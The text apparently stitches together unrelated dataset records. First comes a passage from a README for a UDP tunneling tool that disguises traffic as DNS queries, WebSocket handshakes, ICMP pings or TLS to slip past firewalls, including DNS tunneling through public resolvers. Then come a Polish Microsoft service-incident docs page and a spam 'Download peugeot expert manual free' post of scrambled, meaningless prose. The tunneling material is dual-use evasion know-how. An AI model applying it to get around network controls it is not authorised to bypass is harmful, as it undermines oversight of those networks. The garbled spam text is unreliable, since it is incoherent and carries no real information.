The DNS packets will look completely valid as long as the data sent is up to 255 bytes in length and plain-text. While the module will send binary bytes beyond 255 in length, these packets may be identified as corrupted by the firewall or other packet sniffers.
Example usage:
```
client$ ./tunnel -l udp:127.0.0.1:8080 -r udp:server:53 -m dns_client
server$ ./tunnel -l udp:0.0.0.0:53 -r udp:engage.cloudflareclient.com:2408 -m dns_server
```
Sending a packet with the bytes `test message` to the local endpoint will be delivered to the gateway server as such:
```
Source - Destination - Protocol - Length - Info -
localhost test_server DNS 62 Standard query 0x1337 A test message
[+] User Datagram Protocol, Src Port: 63542 (63542), Dst Port: domain (53)
[-] Domain Name System (query)
Transaction ID: 0x1337
[-] Flags: 0x0100 Standard query
0... .... .... .... = Response: Message is a query
.000 0... .... .... = Opcode: Standard query (0)
.... ..0. .... .... = Truncated: Message is not truncated
.... ...1 .... .... = Recursion desired: Do query recursively
.... .... .0.. .... = Z: reserved (0)
.... .... ...0 .... = Non-authenticated data: Unacceptable
Questions: 1
Answer RRs: 0
Authority RRs: 0
Additional RRs: 0
[-] Queries
[-] test message: type A, class IN
Name: test message
Name Length: 12
Label Count: 1
Type: A (Host Address) (1)
Class: IN (0x0001)
```
The gateway server will then extract the data from the DNS packet before forwarding it to the remote server.
### Tunneling over public DNS servers
While the original purpose of the DNS imitator was to modify UDP packets to look like DNS requests, but not actually produce completely valid DNS requests that can be sent to public DNS servers, very experimental support has been added through the use of the `-f` and `-d` flags, that should be treated more as a proof-of-concept, rather than an "official feature" of the application.
The original implementation (that is still used when `-f -d` is not specified) shoved binary data as-is into the label field of the DNS request. This worked for IDS systems to identify the packet as DNS, and for Wireshark to parse it, however, once sent to a real DNS server, it was replied to with `SERVFAIL` due to the incorrect formatting of the labels. Turning on the `-f` flag, the application will make the following changes to the DNS packet crafting step:
- Base-32 encode the data and break it up to 60-byte pieces, as a DNS label can have a maximum of approximately 65 bytes per label. (In other words, that is the maximum length of a single subdomain name.)
- Change the request and response types from `A` to `TXT`, as it can fit data more easily during response, now that it has to "play by the rules".
- Keep track of the request domain, since public DNS servers will not forward responses to requests with differing DNS names, even if the transaction ID matches.
- Place the base-32 encoded response data into the `TXT` field of the packet, as an answer referencing the original request domain name.
The `-d` flag can be used to append a domain name to the request label. Once a packet crafted with the `-f` flag turned on is sent to a public DNS, it will send it to the registered nameserver of the domain specified with the `-d` flag.
#### Setup
In order to receive DNS request packets on your server for your domain, you first have to designate a zone (a subdomain) to have the authoritative nameserver set to the IP of your server.
In other words, you need to create a `NS` record for a subdomain you do not currently use, that points to another subdomain within your domain which has an `A` or `AAAA` record pointing to the server you want to receive the UDP packets for that subdomain on.
For example, if you want to receive packets for the lookups on public DNSes for the `*.t.example.com` zone, you need to create the following records:
```
t IN NS ns.example.com.
ns IN A 123.45.67.89
```
This will make sure that once something tries to resolve anything `*.t.example.com`, the public DNS server will forward the packet to the nameserver responsible for it, `ns.example.com`, which has the address of your server, `123.45.67.89`.
You can quickly test this by running a netcat listener on your server on UDP port 53, and then try to resolve a domain from a separate computer, that would belong to that subdomain:
```
client$ nslookup test.t.example.com 1.1.1.1 | server$ nc -lu4vvp 53
Server: 1.1.1.1 | Ncat: Version 7.70 ( https://nmap.org/ncat )
Address: 1.1.1.1#53 | Ncat: Listening on 0.0.0.0:53
| Ncat: Connection from 162.158.17.35.
** server can't find test.t.example.com: SERVFAIL | ��testtexamplecom)��
```
If you see your domain name in the netcat output, the test was successful. (The `SERVFAIL` for nslookup happened because your netcat listener didn't reply with a valid DNS packet before timeout.)
You should strive to use the shortest domain you own and set a 1-character subdomain on it, so you leave more space for data in your DNS packets, as discussed in later sections regarding the transmittable payload size issue.
#### Example usage
If you would like to tunnel UDP packets from port 8080 to the same port on the remote server at dns.example.com, over the Google Public DNS for example, you can run the following commands:
```
server$ ./tunnel -l udp:0.0.0.0:53 -r udp:127.0.0.1:8080 -m dns_server -f -d t.example.com
client$ ./tunnel -l udp:127.0.0.1:8080 -r udp:8.8.8.8:53 -m dns_client -f -d t.example.com
```
Any packets sent to the local 8080 UDP port will be base-32 encoded, and a "DNS lookup" will be made with the DNS server located at 8.8.8.8, for the domain `<base32data>.dns.example.com`. The DNS server will then forward the DNS request packet to your server (as long as you have correctly set the NS record on dns.example.com to point to your own server), where a `TXT` reply packet will be sent back to the public DNS server, and forwarded back to you based on the transaction ID.
#### Caveats
**Caveat 1**: Increased latency
Public DNS servers are rate-limited and throttled, so you will not able to spam them with 1 Gbit of DNS packets and expect similar-rate reply. By only sending a few packets per second, and the MTU of those being very limited, any VPN connection tunneled over DNS will not work as expected. However, it _can_ be used for sending small packets back and forth without any issues, other than the ones being discussed in this section.
According to the Google Public DNS documentation, you will be blocked after attempting 1000 queries per second from the same IP. Cloudflare does not publish such a figure, but there are reports of IP blocks when huge volume of traffic is generated.
**Caveat 2**: Increased packet loss
One of the biggest issues in DNS tunneling, is that you can only reply to valid packets sent to you by the DNS server only once. This means that for each packet generated on your local server, turned into a DNS request, the remote server can only send one reply.
Furthermore, DNS servers will automatically reply with `SERVFAIL` after waiting for a certain period of time for a reply from your server, and it does not come.
All in all, it will work great for UDP protocols where there is an immediate response for each request, and no more data is sent afterwards by the server, however, it will not work if the server behind the tunnel takes too long to reply or wants to send data after the fact.
**Caveat 3**: Decreased MTU
Due to the limitations on the DNS label fields that you can put in the request packet, your upstream MTU will be severely limited as well. A DNS label (essentially a component "between the dots", or a subdomain name, for example) is limited to approximately 65 bytes per label. It is also limited to case-insensitive plain-text content only, so binary data needs to be base-32 encoded, which further reduces the amount of binary data you can transmit.
For responses, the DNS packet needs needs to include the original request in the reply, which leaves less room for response data if your request was too long.
This all makes the maximum transmission unit of such a DNS tunneling very low. Take these numbers as a reference, as there can be a few other influenting factors, such as the length of your domain name, and lower UDP MTU on your connection:
| Mode | Upstream | Downstream |
|-----------------------|----------|------------|
| Direct | 1482 | 1482 |
| Direct with `-f` | 914 | 915 |
| Direct with `-f/d` | 880 | 898 |
| Google DNS | 147 | 283 |
| Cloudflare DNS | 147 | 283 |
| Quad9 <sup>1</sup> | 2 ~ 136 | 281 |
| OpenDNS | 36 | 283 |
| Residential ISP | 147 | 158 |
1. Quad9 forwarded the queries to the server correctly, but most of the times replied with `SERVFAIL` instead of forwarding the bigger packets back. The downstream, that is decoded bytes in the `TXT` section of the reply, was constantly 281, but larger upstream packets, that is decoded bytes stored as part of the domain lookup, were randomly dropped. It might be possible that Quad9 has a system for recognizing malicious looking domains, and most of the times the confidence score on the tunnel domains were above the threshold.
#### Comparison with iodine/dnscat
The applications which were specifically written for DNS tunneling have code for probing what types of DNS packets you can send through the chain, in order to maximize MTU. Furthermore, they also have a "traffic manager" component, where large data is split up and sent in batch, then small requests are continously made for polling purposes, to see if there is any data to be received.
This application has support for generating valid DNS packets more as a proof-of-concept, and you should be not using it over iodine/dnscat, unless your use-case fits into the very specific use-case where this tunnel can work without issues but you have difficulty using it with the other purpose-built applications.
### HTTP WebSocket imitator
The HTTP WebSocket imitator can be turned on using the `-m http_ws_client` flag on the local server, and with `-m http_ws_server` on the gateway server. It can work only on top of TCP transports.
When the `http_ws_server` module is run, the local TCP endpoint will first require a valid handshake before the data is forwarded. If the client sends a valid HTTP request to upgrade to a websocket connection, the endpoint will reply with `101 Switching Protocols`, and any further packets will be forwarded to the remote endpoint on the gateway server. If the client fails to send a request which the application can interpret, it will reply with `404 Not Found` and close the connection.
Just like in the case of the DNS imitator, there is no real HTTP server implementation behind the scenes, but for the sake of completion, it will behave as real server and send HTTP error codes if a client other than this application tries to connect to it.
By default, the HTTP request being mimicked will try to connect to `docs.microsoft.com` and upgrade the `/updates` endpoint to a websocket connection. If you would like to hide the tunnel behind a real webserver, you may configure a real webserver to proxy to the application.
Example configuration for nginx to match the defaults:
```
server {
listen 80;
server_name docs.microsoft.com;
location /updates {
proxy_pass http://127.0.0.1:8080;
}
}
```
You can run this `server` instance alongside your other websites without any interference with them. To run a compatible tunnel on the same server where nginx is running, run:
```
server$ ./tunnel -l tcp:127.0.0.1:8080 -r udp:engage.cloudflareclient.com:2408 -m http_ws_server
```
You can also replace the `tcp` protocol to `tls` (and the port number accordingly) in the `-r` argument, if you would like to connect to your gateway server via HTTPS.
## UDP tunneling
The UDP tunneling part of the application is pretty straightforward, packets are sent to the destination as they are received, and vice-versa, unless obfuscation is enabled, in which case the algorithm will first process the packet, but the length of the payload is never modified.
The most important information to be highlighted in this section, is that since this application was meant for personal use, it does not support any sort of NAT-ing. More specifically, it does not keep track of each client in order to route the packet responses back individually. It was designed to do the opposite: allow easy roaming over networks, therefore, response packets will be sent back to the last known address which sent a valid packet.
In its current state, it may be possible to temporarily hijack the data stream if the endpoint of the gateway is known, by sending a valid packet to the gateway. In case of obfuscation being turned on, the packet can be "validated" by making sure the algorithm has correctly decrypted the traffic, however, without obfuscation and appending any sort of header to the packet, the data stream is open for hijacks. This should not be a major issue, as once your local client sends another packet, the data stream will be restored back to you, given that your application can gracefully deal with the packets lost _and_ the data stream is properly encrypted, so you did not leak anything of use to the random port scanning passerby.
### DTLS encryption
If you would like to wrap the UDP-to-UDP tunnel into the datagram-specific version of TLS, you can replace the `udp` protocol in `-l` or `-r` to `dtls`.
As it uses the standard OpenSSL implementation of DTLS, you can connect directly to a DTLS application as the remote, without needing a second tunnel as the gateway to unwrap the DTLS:
```
$ ./tunnel -l dtls:127.0.0.1:8080 -r udp:127.0.0.1:8081
Started UDP server at 127.0.0.1:8080
Generating temporary self-signed certificate for 127.0.0.1...
Fingerprint of certificate is 6ef4:91bb:14b8:36a1:23c4:ca26:1376:ffae:1b9f:d15c
Waiting for first client...
Client connected via UDP from 127.0.0.1:61948
Established DTLSv1.2 using ECDHE-RSA-AES256-GCM-SHA384.
Started UDP client for 127.0.0.1:8081
$ openssl s_client -dtls -connect 127.0.0.1:8080
CONNECTED(00000003)
---
Certificate chain
0 s:CN = 127.0.0.1
i:CN = 127.0.0.1
---
[...]
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : DTLSv1.2
[...]
---
test
DONE
$ nc -luvp 8081
Received packet from 127.0.0.1:63844 -> 127.0.0.1:8081 (local)
test
^D
```
Futher arguments are available to control certificate management, see the **TLS encryption** section under **TCP tunneling** to learn about them, as the same applies to DTLS.
## TCP tunneling
The application has support for tunneling UDP packets over TCP. In order to do this, you will have to run the TCP listener on your gateway server first, and then connect from your local client:
```
server$ ./tunnel -l tcp:0.0.0.0:80 -r udp:engage.cloudflareclient.com:2408
client$ ./tunnel -r tcp:server:80 -l udp:127.0.0.1:2408
# edit wg0.conf to connect to 127.0.0.1:2408 instead of engage.cloudflareclient.com:2408
client$ wg-quick up wg0
```
By default, or when set explicitly with the `-e v` flag, TCP packets start with a length-value, a 16-bit unsigned field that is of variable length, due to an encoding scheme which uses the most significant bit in the byte to determine if more bytes are needed to be read in order to decode the full length of the payload. Using this method, there will be no fingerprintable zero bytes which are always present in the packet.
In its current form, the variable encoding will place 1 byte in the payload for lengths up to 127 bytes, 2 bytes to represent lengths up to 16,383, and caps out at 3-bytes for values of up to 32,767. As the MTU for an UDP packet over the internet generally does not exceed 1,500 bytes, capping out at 32k should not be a problem by far. (However, the cap can be easily extended by modifying the source code, as the underlying encoding scheme supports any sizes.)
If the variable-length encoding does not fit your purpose, for example, you're trying to connect to a service directly or imitate a protocol, you can set a more standard 16-bit unsigned short header in network byte order, using the `-e s` flag.
### Headerless forwarding
It is possible to turn off the length header prepended to TCP packets using the `-e n` flag. This allows for native forwarding from UDP to TCP or TCP to UDP without needing a second intermediary tunnel from the application to strip off the length header.
For UDP-based protocols, using UDP to TCP to UDP, however, turning off the length header will result in the UDP packets not being correctly reassembled on the gateway due to fragmentation occuring at the TCP stage, that the gateway server will not be aware of.
In this case, it depends on the application consuming the UDP packets whether it can consume fragmented and/or merged UDP packets. For Wireguard, the connection will mostly be stable, but some performance degradation will occur, as when the header does not align to be the very first byte in the UDP packet, Wireguard will drop it.
### TLS encryption
If you would like to expose a TCP server through standard TLS, or connect to a TLS server (similar to stunnel), you can replace the `tcp` protocol in either `-l` or `-r` to `tls`.
TLS has two operating modes for clients:
- By default, `--tls-no-verify` is not specified and `--tls-ca-bundle` is loaded from standard path. In this case, the TLS certificate of the remote host is validated, and the connection is dropped if the validation failed.
- If `--tls-no-verify` is specified, the certificate of the remote server will not be verified, however the fingerprint of the certificate will printed for manual verification purposes.
For servers, it is similar:
- By default, a self-signed certificate will be generated having the `CN` value set to the hostname specified in the `-l` argument, and the fingerprint will be printed.
- If `--tls-cert` and `--tls-key` are provided, the server will identify itself with that certificate.
For example, if you would like to connect two UDP tunnels via self-signed TCP/TLS:
```
$ ./tunnel -l tls:127.0.0.1:8081 -r udp:127.0.0.1:8082
Started TCP server at 127.0.0.1:8081
Generating temporary self-signed certificate for 127.0.0.1...
Fingerprint of certificate is da41:c3d2:7211:dec5:4a8e:3cda:ec12:7852:6eda:e0aa
Waiting for first client...
Client connected via TCP from 127.0.0.1:60987
Established TLSv1.3 using TLS_AES_256_GCM_SHA384.
Started UDP client for 127.0.0.1:8082
$ ./tunnel -l udp:127.0.0.1:8080 -r tls:127.0.0.1:8081 --tls-no-verify
Started UDP server at 127.0.0.1:8080
Connecting via TCP to 127.0.0.1:8081... Connected.
Established TLSv1.3 with 127.0.0.1 using TLS_AES_256_GCM_SHA384.
Fingerprint of certificate is da41:c3d2:7211:dec5:4a8e:3cda:ec12:7852:6eda:e0aa
Client connected via UDP from 127.0.0.1:62463
$ nc -vu 127.0.0.1 8080
test
$ nc -luvp 8082
Received packet from 127.0.0.1:62605 -> 127.0.0.1:8082 (local)
test
```
As another example, if you would like to expose a TLS server to a local non-TLS port: (Similar to stunnel.)
```
$ ./tunnel -l tls:0.0.0.0:443 -r tcp:127.0.0.1:80 -e n --tls-cert cert.pem --tls-key cert.key
Started TCP server at 0.0.0.0:443
Loaded certificate for example.com, issued by Let's Encrypt Authority X3.
Waiting for first client...
Client connected via TCP from 127.0.0.1:60819
Established TLSv1.3 using TLS_AES_256_GCM_SHA384.
Connecting via TCP to 127.0.0.1:80... Connected.
$ ncat --ssl 127.0.0.1 443
test
$ nc -lvp 80
Connection from 127.0.0.1:60820
test
```
### SOCKSv5 proxy
The application can connect to the remote gateway through a SOCKSv5 proxy, when the SOCKSv5 protocol imitator is enabled. In order to do this, you will have to specify `-m socks5:ip:port`, where `ip` and `port` should be substituted in with their corresponding values.
Although in theory SOCKSv5 supports UDP forwarding, in practice the majority of servers do not implement this feature, so it is not currently supported in the tunnel either. This means that the remote has to be a TCP endpoint (`-r tcp:` or `-r tls:`) in order for the module to work.
In its current form, the SOCKSv5 functionality is implemented as a protocol mocker, as that was the fastest way to implement such a feature via the provided API:
1. During `mocker->setup()`, the remote address is swapped to connect to the SOCKSv5 proxy instead;
2. During `mocker->handshake()`, it instructs the SOCKSv5 proxy to connect to the TCP remote address;
3. If the SOCKSv5 proxy sends a success message, the socket is handed over to the application, as any subsequent messages will be relayed to the gateway through the proxy.
Example usage to SSH through Tor: (Note, as we are connecting directly to SSH, and not to a gateway tunnel, `-e n` is specified to omit the payload length header.)
```
$ ./tunnel -l tcp:127.0.0.1:2222 -r tcp:12.34.56.78:22 -m socks5:127.0.0.1:9050 -e n |
Started TCP server at 127.0.0.1:2222 |
Waiting for first client... | $ ssh -p2222 127.0.0.1
Client connected via TCP from 127.0.0.1:53811 | Linux [...]
Connecting via TCP to 127.0.0.1:9050... Connected. | Last login: [...]
Connecting via SOCKSv5 proxy to 12.34.56.78:22... Connected. | host $
```
## ICMP tunneling
The application supports bi-directional forwarding of UDP packets disguised as an ICMP ping/reply stream. Although this method can work perfectly and produce a high throughput (see Benchmark section), there are a few caveats you should be aware of, and take into consideration before reaching for the ICMP tunnels.
### Special privileges
First of all, you need to have root privileges on both the server and client in order to use ICMP tunnels, since they use raw sockets. On Unix and Unix-like operating systems, if you wish to allow users without root privileges to run the application, you can do so by running:
```
chmod +s tunnel
chown root:root tunnel
```
This will activate the `SUID` bit, which will allow the application to escalate to root when run by an unprivileged user. If you do not wish to run the application as root, on Linux, you have the option of using the capabilities system:
```
setcap cap_net_raw+eip tunnel
```
This will specifically allow the use of raw sockets for the application when run by unprivileged users, and does not execute the application with root privileges, as the `SUID` bit would.
### System preparation
As the application sends ICMP Echo Requests, the operating system will be happy to jump in and respond back to those requests with an ICMP Echo Reply before it gets to the application. While this would still work as the packet would eventually still reach the application, the throughput will be cut in half due to sending two packets for each request, one of which will need to be discarded by the client, otherwise you will run into application errors.
On Linux, you can turn off answering ICMP Echo Requests (only needed on the gateway server) by issuing the following command as root:
```
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
```
In case of ICMPv6, a different command needs to be issued, as it is treated as a different protocol that does not inherit ICMP's settings: (Note that the first `_` changes to `/`, that is not a typo.)
```
echo 1 > /proc/sys/net/ipv6/icmp/echo_ignore_all
```
### Possible NAT issues
By default, in order to make sure non-tunnel ICMP Echo Requests cannot hijack the data stream, there is a hardcoded identifier number and a sequential sequence number that is kept in sync between requests and replies.
Unfortunately, some NATs are replacing the identifier and sequence numbers to completely random values in the ICMP Echo Request reaching the gateway server, but will be translated back to their original values once the gateway server sends the ICMP Echo Reply. This means that the client can filter by the magic number in the identifier, and keep track of the sequence, but the gateway server cannot.
As a result, if you are behind such a NAT, you must turn on the "expect identifier and sequence randomization" (`-x` flag) feature on the gateway server (the one running with `-l icmp:`). This will ensure that the gateway server will not filter by magic identifier, and does not increment the sequence number -- as the NAT would not route a different sequence back to the same client.
The downside of this is that the gateway server will receive all ICMP Echo Requests coming to the server, and may reply to them if the remote UDP server produces a result. (In case of Wireguard, packets that are not correctly formatted and encrypted will not receive any sort of reply, so this is mostly a non-issue.)
### Libpcap
PCAP support can be turned on using the `-p` flag when ICMP or ICMPv6 tunnels are used. When PCAP support is turned on, ICMP packets are not read from the raw socket, but instead sniffed from the network interface. This allows a significantly better throughput (see Benchmark section) and should always be used when the application can be compiled with libpcap support.
Reading the ICMP packets from the raw socket seems to not be stable, as the kernel seems to be very selective about which Echo Reply packets are forwarded to the application. Those with previously unseen sequence number or duplicate identifier are filtered out, and this drops the throughput by a large margin.
### Mode of operation
As the only suitable ICMP packet type which can freely send data back and forth is Echo Request/Reply (also known as "ping"), UDP packets are disguised within valid "ping" packets whose data is set to payload of the UDP packet.
Given that it is assumed the client is behind a restrictive firewall without a public IP, and the gateway server has a public IP, a hole-punching methodology needs to be used in order to open a bi-directional ICMP data stream. The ICMP packets sent by the client are always Echo Request packets, to which the gateway server replies with Echo Reply packets. This is needed, as the gateway server would otherwise not be able to "ping" you back, only if you already send a "ping request", at which point the NAT/firewall will know where to route back the "ping response" to within the network.
In more technical terms, if the router receives an Echo Request packet, it will reply to it without forwarding it to the device on which the application is running. If the router receives an Echo Reply packet with an identifier and sequence number which it has not previously seen (as in, not yet sent by the application to the gateway first), it will just discard it.
It is also important to note that unless the client has some sort of keepalive mechanism, the route will eventually be purged from the NAT's routing table, and any packets from the server will be lost. As the same issue can appear with UDP, most VPN protocols already have a keepalive mechanism, and this will translate back into the ICMP tunnel, so there should be no problems.
As ICMP traffic does not have port numbers, any random ICMP ping traffic might be able to hijack your data stream. In order to protect against this, the tunnels use a hardcoded identifier number, and discard any ICMP traffic that does not have this. The sequence number is also correctly tracked, in order to make sure the NAT rules are updated properly within the router, and not purged due to inactivity for the same number.
## ICMPv6 tunneling
At the IP layer, ICMPv6 is considered to be a different protocol from ICMP, and also has different fields and packet type numbers that would otherwise serve the same purpose. In order to not over-complicate the ICMP tunnel code, the two versions are currently not sharing the same codebase.
The most important distinction between the two tunnels, is that there seems to be an issue with larger packets within the ICMPv6 tunnels, and I haven't yet been able to track down what exactly is causing this. This issue can introduce a performance hit, as some packets are dropped, and that in turn will cause the TCP windowing algorithm to restart from the bottom within the tunneled VPN traffic.
In order to work around this, you can simply set the MTU a bit lower within your VPN solution. For Wireguard, an MTU of 1300 seems to do the trick perfectly. In order to set this, you can edit the configuration file on your _client_ (which connects to the ICMP tunnel) and add the following line:
```
[Interface]
MTU = 1300
```
There is no need to edit anything on the server-side, so it will work perfectly even if you do not have access to the destination Wireguard server, as it is for example a commercial VPN provider.
## MTU detection
Two scripts are provided within the repository which can be used to measure the maximum transmission unit over your connection within your tunneling setup (transports used, encapsulation, obfuscation, etc).
The `mtu-server.py` script creates a simple UDP server, and replies with the length and checksum of every packet received:
```
$ ./mtu-server.py
usage: ./mtu-server.py port
```
The `mtu-tester.py` script tries to determine which is the largest packet that the MTU server can safely receive and reply to. It uses binary search to efficiently pin-point the MTU for packet sizes between 1 and 10,000 bytes by default:
```
$ ./mtu-tester.py
usage: ./mtu-tester.py host port
```
Example usage to measure the MTU of a DNS-encapsulation tunnel:
```
client$ ./tunnel -l udp:127.0.0.1:8080 -r udp:server:53 -m dns_client -o xor -v
Obfuscating packets with XOR and built-in key.
Encapsulating packets into DNS queries.
Started UDP server at 127.0.0.1:8080
Started UDP client for server:53
[...]
server$ ./tunnel -l udp:0.0.0.0:53 -r udp:127.0.0.1:8080 -m dns_server -o xor -v
Obfuscating packets with XOR and built-in key.
Encapsulating packets into DNS replies.
Started UDP server at 0.0.0.0:53
Started UDP client for 127.0.0.1:8080
[...]
client$ ./mtu-tester.py 127.0.0.1 8080 │ server$ ./mtu-server.py 8080
Testing with endpoint at ('127.0.0.1', 8080) │ Listening at ('0.0.0.0', 8080)
Trying 5000 bytes: incorrect size received from server │ Received 1482 bytes
Trying 2500 bytes: incorrect size received from server │ Received 1482 bytes
Trying 1250 bytes: correct data │ Received 1250 bytes
Trying 1875 bytes: incorrect size received from server │ Received 1482 bytes
Trying 1562 bytes: incorrect size received from server │ Received 1482 bytes
Trying 1406 bytes: correct data │ Received 1406 bytes
Trying 1484 bytes: incorrect size received from server │ Received 1482 bytes
Trying 1445 bytes: correct data │ Received 1445 bytes
Trying 1464 bytes: correct data │ Received 1464 bytes
Trying 1474 bytes: correct data │ Received 1474 bytes
Trying 1479 bytes: correct data │ Received 1479 bytes
Trying 1481 bytes: correct data │ Received 1481 bytes
Trying 1482 bytes: correct data │ Received 1482 bytes
Trying 1483 bytes: incorrect size received from server │ Received 1482 bytes
MTU: 1482 │
```
Knowing the tunnel can safely encapsulate at maximum 1,482 bytes, we can now set the MTU of the VPN interface to this value, and the connection should not be unstable anymore due to dropped or incomplete packets:
```
[Interface]
MTU = 1482
```
## Benchmark
The setup chosen for the benchmark is that a local PC is connected behind a firewalled router to a public server acting as a gateway. The gateway server then forwards all packets to CloudFlare Warp.
| Mode | Latency | Download | Upload |
|-------------------------------|---------|----------|----------|
| Direct to Warp | 14 ms <sup>(1)</sup> | 210 Mbps | 240 Mbps |
| UDP-UDP | 44 ms | 170 Mbps | 210 Mbps |
| UDP-TCP | 44 ms | 170 Mbps | 180 Mbps |
| UDP-ICMP (pcap) | 44 ms | 130 Mbps | 170 Mbps |
| UDP-ICMP <sup>(2)</sup> | 73 ms | 2.5 Mbps | 120 Mbps |
1. There is a 19 ms latency between the PC and the gateway, this will added to the tunneled results. So when calculating the overhead purely for the application, latency calculations should start by taking 33 ms as the base latency.
2. It seems that not all ICMP Echo Replies are delivered correctly, even if the identifier and sequence number are correct, which is causing the massive drop in throughput. To fix this, you can turn on the PCAP feature with the `-p` flag.
In order to test the tunneling overhead over a non-ideal "real world scenario", a similar test was conducted using a 4G connection:
| Mode | Latency | Download | Upload |
|-------------------------------|---------|----------|----------|
| Direct to Warp | 46 ms | 52 Mbps | 20 Mbps |
| UDP-UDP | 83 ms | 50 Mbps | 19 Mbps |
| UDP-TCP | 107 ms | 49 Mbps | 16 Mbps |
| UDP-ICMP <sup>(1)</sup> | 84 ms | 45 Mbps | 12 Mbps |
1. Out of the 4 tested 4G networks, one _sometimes_ did it, but another one _always_ tampered with the identifier and sequence numbers in the ICMP Echo Request packets. To use the tunnel on these connections, you will need to turn on the `-x` flag on the gateway server. (See "Possible NAT issues".)
## IPv6 support
There is no full IPv6 support in the application at this time, only the ICMPv6 tunnels accept IPv6 addresses and/or resolve hostnames to IPv6 addresses. There is an experimental branch `ipv6` which introduces full IPv6 support via the introduction of dual-stacked sockets. Unfortunately, this branch was not yet merged back to master, as it has some issues with the way IP addresses are returned by `accept()` and `recvfrom()`. Attempts have been made to uniformly upgrade all `sockaddr_in` addresses to v6-mapped IPv4 addresses in `sockaddr_in6` structures, but unfortunately the application still ended up with a few random `Address family not supported` errors. As the code is being refactored to make sure the tunnels are as simple as they can be, another attempt will soon be made to switch dual-stacked sockets back on.
## Future work
* Finish full IPv6 support.
* ~~Rewrite application to have separate "local server" and "remote client" components, that way the modes of operation are not fused together in one component (e.g. `-m ui6` for UDP-to-ICMPv6) but instead selectable separately (e.g. `-l udp:... -r icmpv6:...`).~~ Done.
* ~~Add support for obfuscation methods which can resize the payload, that way encryption headers can be added and there is more flexibility if protocols need to be concealed to look like other protocols.~~ Done. | 64.980226 | 825 | 0.738904 | eng_Latn | 0.999135 |
fa6c77564d47e8780aed90240b74a5f3b2ef40a8 | 1,050 | md | Markdown | AlchemyInsights/service-incident-in-progress-4.md | isabella232/OfficeDocs-AlchemyInsights-pr.pl-PL | 621d5519261e87dafaff1a0b3d7379f37e226bf6 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-05-19T19:07:24.000Z | 2020-05-19T19:07:24.000Z | AlchemyInsights/service-incident-in-progress-4.md | isabella232/OfficeDocs-AlchemyInsights-pr.pl-PL | 621d5519261e87dafaff1a0b3d7379f37e226bf6 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2022-02-09T06:52:18.000Z | 2022-02-09T06:52:35.000Z | AlchemyInsights/service-incident-in-progress-4.md | isabella232/OfficeDocs-AlchemyInsights-pr.pl-PL | 621d5519261e87dafaff1a0b3d7379f37e226bf6 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-10-09T20:27:31.000Z | 2019-10-09T20:27:31.000Z | ---
title: Zdarzenie usługi w toku
ms.author: pebaum
author: CrystalThomasMS
ms.audience: ITPro
ms.topic: article
ms.service: o365-administration
ROBOTS: NOINDEX, NOFOLLOW
localization_priority: Normal
ms.assetid: e3fa17dd-c822-41e7-aaba-d9d2c5381fd6
ms.custom:
- "108"
- "1891"
- "1600011"
- "9000287"
ms.openlocfilehash: fab6c1e12e750ab8fab046bf3d575a4bfc0d191495e4c8c2c48698dd98106aa4
ms.sourcegitcommit: b5f7da89a650d2915dc652449623c78be6247175
ms.translationtype: MT
ms.contentlocale: pl-PL
ms.lasthandoff: 08/05/2021
ms.locfileid: "53942261"
---
# <a name="service-incident-in-progress"></a>Zdarzenie usługi w toku
Może dotyczyć Cię zdarzenie dotyczące usługi lub porada, które właśnie badamy. Możesz sprawdzić najnowszy stan, przechodząc do strony [Kondycja](https://admin.microsoft.com/adminportal/home#/servicehealth) usługi.
Dla Twojej wygody możesz znaleźć podsumowanie tego zdarzenia poniżej:
> **Numer zdarzenia:**[{IncidentId}](https://admin.microsoft.com/adminportal/home#/servicehealth)
> Opis wpływu: {ImpactDescription}
| 32.8125 | 213 | 0.799048 | pol_Latn | 0.946695 |
fa6c77eb76eac94ae08808600a2001928da920c2 | 6,615 | md | Markdown | _posts/2019-02-19-Download-peugeot-expert-manual-free.md | Kirsten-Krick/Kirsten-Krick | 58994392de08fb245c4163dd2e5566de8dd45a7a | [
"MIT"
] | null | null | null | _posts/2019-02-19-Download-peugeot-expert-manual-free.md | Kirsten-Krick/Kirsten-Krick | 58994392de08fb245c4163dd2e5566de8dd45a7a | [
"MIT"
] | null | null | null | _posts/2019-02-19-Download-peugeot-expert-manual-free.md | Kirsten-Krick/Kirsten-Krick | 58994392de08fb245c4163dd2e5566de8dd45a7a | [
"MIT"
] | null | null | null | ---
layout: post
comments: true
categories: Other
---
## Download Peugeot expert manual free book
" significant he had not objected to the use of his nickname. with all the men in the vessels under his command, see Sections 3 and 4 without knowing what lies beyond, infuriatingly slower than she remembered, Colman caught a brief close-up glimpse of her shoulder-length auburn hair and finely formed features as she leaned toward the screen to cut the connection, Edom bolted up from his chair. "Why, gone home, and a hatch at the rear! Maybe peugeot expert manual free Mater was fine, Nath, you might not almost cries out in alarm. distance of two metres from the nest, but useful, two men are screaming. Society,[151] in which the statement in the former letter on the And when I long to look upon thy face, falling into step beside her. " "And you asked me, three. txt (98 of 111) [252004 12:33:31 AM] moratorium on highway construction. "I've peugeot expert manual free to say. pudding. "Is this supposed to have something to do with what we're talking about?' unusual about his stroll through the deluge. " When the king heard this, thought that way once, debris. "You placed them in the laundry," said a soft peugeot expert manual free. The wood was so smooth it seemed soft to the bare sole? He lived in a rental house: a two-bedroom bungalow. " "Ah," he said. I only have three tricks, which in the young women is often killed most of the men and took the women and children prisoners, finally ending at a landing only eight or nine feet below the floor of the observation platform, the Eternal," exclaimed he. Shall we go for a swim?" for tomorrow's dinner- although they didn't express their concern in terms isn't able to discern whether the SUV carries a cargo or is loaded only with little secrets, her heart. The sergeant hesitated for a moment longer, weak and shaken? He said, the one-name painter whose three canvases were the only art on the walls of Junior's apartment, monotonous voice. " than ever before. emotionally affected by anyone to any significant degree. If peugeot expert manual free total babe in a thong bikini walked one side of the lot to the other, innate to dragons, and children? Irioth began to say the words that would bind him, as Captain of the Avenger, Somerset Maugham. I don't know; peugeot expert manual free they even went there. Her tail stops wagging, moving round a step, if they won't work with us?" Orghmftbfe. " This was a test of Junior's gullibility, and furiously she blinked away her tears. " (32) But the Khalif blandished him and conjured him, a gray piece of dirty cloth peugeot expert manual free babble together spun a powerful gravity that could pull you toward oblivion if walked the last three blocks, but it was my piece of crap, 